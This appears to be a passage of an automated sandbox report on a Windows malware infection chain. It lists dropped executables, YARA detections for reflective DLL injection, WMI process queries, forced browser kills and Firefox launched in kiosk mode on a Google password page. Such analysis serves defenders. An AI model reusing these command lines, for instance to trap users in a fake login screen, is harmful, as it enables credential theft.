                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: String function: 00007FF643F592E0 appears 33 times
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: String function: 00007FF643F460E0 appears 31 times
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: String function: 00007FF643F444A0 appears 127 times
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: String function: 00007FF643F408C0 appears 31 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 002580C0 appears 130 times
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00FCDF80 appears 36 times
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00FC80C0 appears 260 times
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: String function: 00007FF6845844A0 appears 127 times
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: String function: 00007FF6845808C0 appears 31 times
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: String function: 00007FF6845860E0 appears 31 times
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: String function: 00007FF684581B10 appears 35 times
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: String function: 00007FF6845992E0 appears 33 times
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: String function: 00007FF684598F10 appears 31 times
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: String function: 00007FF68457F4A0 appears 112 times
                      Source: random[1].exe.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: be08f59021.exe.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 44.2.firefox.exe.144aa0f0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 43.2.firefox.exe.2392c270000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 44.2.firefox.exe.144aa140000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 44.2.firefox.exe.144aa140000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 44.2.firefox.exe.144aa0f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 43.2.firefox.exe.2392c270000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 20.3.explorer.exe.d60a960.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 43.2.firefox.exe.2392dca0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 20.0.explorer.exe.89a0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 20.3.explorer.exe.d60a960.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 20.0.explorer.exe.89a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 43.2.firefox.exe.2392dca0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 0000002C.00000002.2615996030.00000144AA140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 0000002B.00000002.2491500061.000002392DCA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 0000002B.00000002.2489426233.000002392C270000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 0000002C.00000002.2615892313.00000144AA0F0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 00000014.00000000.2216112963.00000000089A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\output[1].png, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
                      Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
                      Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\output[1].png, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
                      Source: Y-Cleaner.exe.22.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: soft[1].22.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: random[2].exe.7.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                      Source: random[2].exe.7.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                      Source: random[2].exe1.7.drStatic PE information: Section: tdoajogz ZLIB complexity 0.9946871470256025
                      Source: d8d3046b98.exe.7.drStatic PE information: Section: tdoajogz ZLIB complexity 0.9946871470256025
                      Source: d8d3046b98.exe.7.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                      Source: random[2].exe1.7.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@113/133@73/14
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F25D60 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep,SleepEx,_invalid_parameter_noinfo_noreturn,9_2_00007FF643F25D60
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F35EC0 GetModuleFileNameA,GetLastError,GetLastError,CoInitializeEx,CoCreateInstance,CoUninitialize,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,SysAllocString,SysFreeString,CoUninitialize,SysAllocString,SysFreeString,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,SysFreeString,CoUninitialize,SysAllocString,VariantInit,SysAllocString,SysAllocString,SysFreeString,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,9_2_00007FF643F35EC0
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Program Files\Google\Chrome\ExtensionsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\dwVrTdy[1].exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\worker_RdDwvE
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
                      Source: C:\Windows\System32\audiodg.exeMutant created: \Sessions\1\BaseNamedObjects\worker_kBEqZh
                      Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\worker_BAccdq
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6460:120:WilError_03
                      Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\GqgWzd
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1492
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1492
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1492
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1492
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4540
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4540
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4540
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4540
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1492
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1492
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4540
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4540
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1704
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9024
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9024
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe "C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe "C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe "C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe "C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe "C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe "C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe"
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe "C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe "C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe"
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeProcess created: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                      Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
